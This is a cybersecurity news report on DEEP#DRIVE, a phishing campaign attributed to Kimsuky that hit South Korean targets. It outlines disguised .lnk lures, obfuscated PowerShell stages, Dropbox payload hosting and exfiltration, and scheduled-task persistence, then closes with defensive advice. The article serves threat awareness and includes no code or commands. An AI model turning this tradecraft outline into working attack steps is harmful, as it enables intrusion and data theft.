A recent cybersecurity investigation has uncovered a sophisticated attack campaign, dubbed DEEP#DRIVE, attributed to the North Korean Advanced Persistent Threat (APT) group, Kimsuky.
This operation has targeted South Korean businesses, government entities, and cryptocurrency users by exploiting trusted platforms like Dropbox and leveraging obfuscated PowerShell scripts for stealthy infiltration.
The attack begins with phishing emails containing malicious shortcut (.lnk) files disguised as legitimate documents such as work logs, insurance forms, or cryptocurrency-related files.
These files are crafted to bypass security measures by exploiting Windows’ default behavior of hiding file extensions.
Once executed, the malicious .lnk files initiate a multi-stage attack chain involving PowerShell scripts to download and execute further payloads.
Key Attack Techniques
According to Securonix Report, the campaign relies heavily on Dropbox for hosting malware payloads and exfiltrating stolen data.
By using Dropbox’s reputation as a trusted platform, the attackers evade conventional network defenses.
The initial stage involves downloading a compressed file containing a shortcut file that triggers the execution of obfuscated PowerShell scripts.
These scripts perform various functions, including:
- Reconnaissance: Gathering system information such as IP addresses, operating system details, antivirus products, and running processes.
- Payload Execution: Downloading and executing additional malware components stored in Dropbox.
- Persistence: Establishing scheduled tasks disguised as legitimate system updates to ensure the malware remains active even after system reboots.
The attackers employed advanced obfuscation techniques in their scripts, such as meaningless variable names and junk code, to evade detection by antivirus software and log analysis tools.
Additionally, they used Base64 encoding and dynamic file processing to hide their activities.
Infrastructure and Attribution
The attackers’ infrastructure was short-lived but dynamic, with rapid takedowns of critical Dropbox links to hinder analysis.
The use of OAuth tokens for Dropbox API interactions facilitated seamless data exfiltration to preconfigured directories.
Thousands of victim configuration files were discovered in the attackers’ Dropbox repository, indicating a large-scale campaign dating back several months.
The tactics, techniques, and procedures (TTPs) observed align closely with previous campaigns attributed to Kimsuky.
The group’s focus on South Korea, use of Dropbox for malware delivery, and reliance on phishing lures written in Korean strongly support this attribution.
.webp)
This campaign underscores the growing sophistication of APT groups in leveraging trusted cloud platforms for malicious purposes. Organizations are advised to:
- Avoid downloading unsolicited attachments or files from unknown sources.
- Monitor common malware staging directories for suspicious activity.
- Deploy robust endpoint logging capabilities to detect PowerShell-based attacks.
- Educate employees on recognizing phishing attempts and the risks associated with .lnk files.
As cyber threats evolve, vigilance and proactive security measures remain critical in mitigating risks posed by advanced adversaries like Kimsuky.
%20group,%20Kimsuky.){kind=link}